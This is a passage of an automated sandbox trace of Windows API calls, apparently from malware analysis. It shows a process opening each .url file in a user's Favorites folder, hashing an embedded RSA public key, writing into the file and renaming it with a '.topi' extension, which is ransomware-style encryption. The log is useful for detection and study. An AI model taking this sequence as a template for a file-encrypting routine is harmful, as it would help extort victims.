lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.360] WriteFile (in: hFile=0x6a8, lpBuffer=0x31b3ff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31b3ff8*, lpNumberOfBytesWritten=0x9ccfb14*=0x80, lpOverlapped=0x0) returned 1 [0096.361] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.361] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.361] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.361] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.361] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.361] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.361] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.361] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.361] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.361] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.361] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.361] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.361] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.361] CloseHandle (hObject=0x6a8) returned 1 [0096.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0096.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0096.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0096.386] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.topi")) returned 1 [0096.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.387] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0096.388] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0096.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xbe) returned 0x99e6040 [0096.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.388] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned=".url" [0096.388] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.389] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.389] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.392] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.392] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.393] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.393] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.393] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.393] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x85, lpOverlapped=0x0) returned 1 [0096.393] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.393] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.393] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.393] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.393] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0096.394] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.394] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.394] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.394] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.394] GetLastError () returned 0x0 [0096.394] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.394] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0096.394] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.394] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.394] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.394] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.394] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.394] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.394] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02798 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98b8 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a027e0 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.395] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d98e8 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d98d0 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.395] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.396] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.396] GetCurrentThreadId () returned 0x8c4 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7c80 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.397] GetCurrentThreadId () returned 0x8c4 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.398] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.398] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.398] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.398] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.398] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.398] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.398] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.398] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.398] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.398] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.topi")) returned 1 [0096.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.399] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.400] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0096.400] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0096.400] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned=".url" [0096.400] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.402] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=134) returned 1 [0096.402] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.405] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.405] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.406] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0096.407] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.407] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.407] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.407] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.407] GetLastError () returned 0x0 [0096.407] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.407] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0096.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.407] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.407] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.408] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.408] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.408] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.408] HeapFree 